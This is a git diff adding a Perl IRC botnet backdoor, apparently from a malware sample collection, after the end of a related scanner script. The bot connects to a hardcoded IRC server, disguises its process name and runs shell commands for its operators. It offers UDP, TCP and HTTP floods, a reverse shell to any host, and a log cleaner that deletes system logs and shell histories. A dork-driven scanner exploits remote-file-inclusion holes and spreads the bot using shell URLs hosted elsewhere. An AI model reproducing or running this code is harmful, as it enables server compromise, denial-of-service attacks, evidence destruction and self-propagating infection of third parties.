+push(@lst,@grep); +}} +return @lst; +} + +sub links() +{ +my @l; +my $link=$_[0]; +my $host=$_[0]; +my $hdir=$_[0]; +$hdir=~s/(.*)\/[^\/]*$/\1/; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$host.="/"; +$link.="/"; +$hdir.="/"; +$host=~s/\/\//\//g; +$hdir=~s/\/\//\//g; +$link=~s/\/\//\//g; +push(@l,$link,$host,$hdir); +return @l; +} + +sub geths(){ +my $host=$_[0]; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +return $host; +} + +sub key(){ +my $chiave=$_[0]; +$chiave =~ s/ /\+/g; +$chiave =~ s/:/\%3A/g; +$chiave =~ s/\//\%2F/g; +$chiave =~ s/&/\%26/g; +$chiave =~ s/\"/\%22/g; +$chiave =~ s/,/\%2C/g; +$chiave =~ s/\\/\%5C/g; +return $chiave; +} + +sub query($){ +my $url=$_[0]; +$url=~s/http:\/\///; +my $host=$url; +my $query=$url; +my $page=""; +$host=~s/href=\"?http:\/\///; +$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query=~s/$host//; +if ($query eq "") {$query="/";}; +eval { +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +close($sock); +}; +return $page; +} + +sub unici{ +my @unici = (); +my %visti = (); +foreach my $elemento ( @_ ) +{ +next if $visti{ $elemento }++; +push @unici, $elemento; +} +return @unici; +} + +sub http_query($){ +my ($url) = @_; +my $host=$url; +my $query=$url; +my $page=""; +$host =~ s/href=\"?http:\/\///; +$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; +$query =~s/$host//; +if ($query eq "") {$query="/";}; +eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); +}; +return $page; +} +} + + +############################################### +# # +# pemula XtReme scanNER # +# # +############################################### diff --git a/Perl/Backdoor.Perl.IRCBot.z b/Perl/Backdoor.Perl.IRCBot.z new file mode 100644 index 00000000..11823930 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.z @@ -0,0 +1,2116 @@ +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +################################# + +###################### +use HTTP::Request; +use LWP::UserAgent; +###################### +my $processo = '/usr/sbin/httpd'; +###################### +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +############################################ +my $linas_max='8'; +#----------------- # +# Maximum Lines for Anti Flood # +############################################# +my $sleep='5'; +#----------------- # +#Sleep Time # +############################################ +my $cmd="http://freewebs.com/alb_rinia/r57.txt?"; +#----------------- # +#CMD that is printed in the channel # +############################################ +my $id="http://www.gg2003.de/phpBB2//language/kar/id.txt?"; +#----------------- # +#ID = Response CMD # +############################################ +my $spread="http://www.gg2003.de/phpBB2//language/kar/spread.txt?"; +#----------------- # +#Spreader # +############################################ +my @adms=("MrNETi"); +#my @hostauth=("mrneti.com"); +#----------------- # +#Admins of the Bot set your nickname here # +############################################ +my @canais=("#asc"); +#----------------- # +#Put your channel here # +############################################ +my $nick="LIN[TC|00|MR]".int(rand(1000)).""; +#----------------- # +#Nickname of bot # +############################################ +my $ircname ='Alb'; +chop (my $realname = 'Albania Security Clan'); +#----------------- # +#IRC name and Realname # +############################################ +$servidor='mrcold.no-ip.biz' unless $servidor; +my $porta='6667'; +#----------------- # +#IRCServer and port # +############################################ +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +###################### +#End of Configuration# +# # +###################### +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 cHApoenk\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + +#End of Connect + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# PREFIX # +# # +###################### +# You can change the prefix if you want but the commands will be different +# The standard prefix is !bgr if you change it into !bitch for example +# every command will be like !bitch @udpflood, !bitch @googlescan. +# So its recommended not to change this ;) +###################### + + if ($args =~ /^(\Q$meunick\E|\!asc)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!asc" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } +} +} +###################### +# End of PREFIX # +# # +###################### + +elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { +if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +} +} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { +nick("$meunick".int rand(999999)); +} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { +$meunick = $2; +$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; +$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; +foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); +} +} +} + +sub bfunc { +my $printl = $_[0]; +my $funcarg = $_[1]; +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { + exit; +} else { + +###################### +# Help # +# # +###################### + +if ($funcarg =~ /^help/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Select the function you want help for"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@ddos"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@scanscan"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@backconnect"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscanner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) Or if you want too know all the commands type:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@commands"); + +} + +if ($funcarg =~ /^ddos/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There are 3 DDossers in this bot"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) UDPFlood, HTTPFlood and TCPFlood"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@httpflood <site> <time>"); + +} + +if ($funcarg =~ /^scan/) { + #sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot also contains a scan scanner."); + +} + +if ($funcarg =~ /^backconnect/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You use backconnect like this :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@back <ip><port>"); +} + +if ($funcarg =~ /^shell/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) This bot has a integrated shell"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use it in private but also public in the channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) In public channel just use : 7!bgr cd tmp12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) For help with the linux commands type :!bgr 7@linuxhelp"); +} + +if ($funcarg =~ /^port/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) There is a normal portscan and a Nmap:"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@nmap <ip> <beginport> <endport>"); +} + +if ($funcarg =~ /^commands/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) You can use the following commands :"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@portscan <ip>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@nmap <ip> <beginport> <endport>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@back <ip><port>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc cd tmp 12 for example"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@udpflood <ip> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@tcpflood <ip> <port> <packet size> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@httpflood <site> <time>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@linuxhelp"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@spread <scan>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@scan <vuln> <dork>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@system"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@logcleaner"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@sendmail <subject> <sender> <recipient> <message>"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@milw0rm"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@join #channel"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Help4+) !asc 7@part #channel"); +} + +if ($funcarg =~ /^linuxhelp/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Dir where you are : pwd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Start a Perl file : perl file.pl"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Go back from dir : cd .."); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Force to Remove a file/dir : rm -rf file/dir;ls -la"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Show all files/dir with permissions : ls -lia"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find config.inc.php files : find / -type f -name config.inc.php"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all writable folders and files : find / -perm -2 -ls"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all .htpasswd files : find / -type f -name .htpasswd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LinuxHelp4+) - Find all service.pwd files : find / -type f -name service.pwd"); +} + +###################### +# End of Help # +# # +###################### +if ($funcarg =~ /^spread\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Spreading bot on :14 $vuln"); +my $shellurl="http://".$vuln.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$shellurl); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Spread Mode4+) Bot is Spreaded on :14 $vuln"); +} +###################### +# Commands # +# # +###################### + +if ($funcarg =~ /^system/) { +$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`; + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Info BOT : Server : 14Cannot View :14 1337"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uname -a : 7 $uname"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Uptime : 7 $uptime"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Prosses : 7 $processo"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) ID : 7 $id"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Own Dir : 7 $ownd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) OS : 7 $distro"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Owner : 7 cHApoenk"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+System Info4+) Channel : 7 #354"); +} + +if ($funcarg =~ /^bug/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+) Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Milw0rm Hack4+)14 $bug[$x] -3 $ltt[$x]"); + sleep 1; +}} +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Portscan # +# # +###################### + +if ($funcarg =~ /^port (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) scanning for open ports on  4".$1." started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) Open ports founded:5 @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Portscan4+) No open ports foundend."); + } +} + +###################### +# End of Portscan # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Nmap # +# # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) :4 $1 (4+Port4+) 4 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Founded 4 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Nmap4+) No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Log Cleaner # +# # +###################### +if ($funcarg =~ /^logcleaner/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) This process can be long, just wait"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) All default log and bash_history files erased"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Now Erasing the rest of the machine log files"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+LogCleaner4+) Done! All logs erased"); + } +###################### +# End of Log Cleaner # +# # +###################### +# +# cHApoenk XtReme scanner Bot +# +###################### +# MAILER # +# # +###################### +# For mailing use : +# !bgr @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Sending Mail to :10 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Mailer4+) Mail Sended To :10 $recipient"); +} +###################### +# End of MAILER # +# # +###################### +###################### +# Join And Part # +# # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# TCPFlood # +# # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+TCPKill4+) Attacking 4 ".$1.":".$2." for 4 ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :(4+TCPKill4+) Attack done 4 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# Back Connect # +# # +###################### +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { + $shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); +if ($estatisticas) +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+BackConnect4+) Connecting to 4 $host:$porta"); +} +} +###################### +#End of Back Connect# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# EXTREME scanNER # +# # +###################### +###################################################################### +#################### GOOGLE +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message + sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+Initializing4+) Backdoor scan is for12 $bug and12 $dork"); +### End of Start Message +# Starting The Search Engine + my @google=&googlet($dork); +# +push(my @tot, @google); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Google4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4Dibuang Sayang -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AllTheWeb +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alltheweb=&allthewebt($dork); + my @allweb=&standard($dork); +# +push(my @tot, @alltheweb, @allweb); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+AllWeb4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### LYCOS +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @lylist=&lycos($dork); +push(my @lybyp,@lylist); +# +push(my @tot, @lybyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Lycos4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my 